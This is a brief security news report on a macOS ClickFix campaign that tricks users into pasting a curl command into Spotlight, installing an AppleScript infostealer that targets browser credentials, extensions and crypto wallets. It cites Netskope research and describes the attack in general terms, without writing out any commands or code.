AppleScript infostealer deployed in new macOS ClickFix campaign

Multiple web browsers, browser extensions, and cryptocurrency wallets could have their stored credentials and live session cookies compromised by a new AppleScript-based information-stealing malware spread in a macOS-targeted ClickFix campaign, reports The Register.

Initial detection of a desktop environment prompts the malware to divert to a counterfeit CAPTCHA page that verifies the desktop OS and tracks for macOS-specific strings before asking users to paste a curl command under the guise of a "verification code" into the search function of Spotlight, according to a Netskope Threat Labs analysis. Execution of the command triggers clandestine loading of a malicious script that enables username theft, command-and-control server address hardcoding, and temporary directory creation. While macOS Tahoe 26.4 or macOS Sequoia prevents the intrusion, older macOS versions allow the malware to proceed with credential harvesting.

Aside from siphoning various user data, the AppleScript infostealer also enables the exfiltration of extensive data from a dozen Chromium-based browsers, Mozilla Firefox, and the Firefox-based Waterfox browser, as well as 16 standalone crypto wallet apps and over 200 browser extensions. Such an intrusion campaign was noted by Netskope researcher Jan Michael Alcantara to be unrelated to APT38's recent social engineering operation aimed at macOS users' credentials and crypto wallets.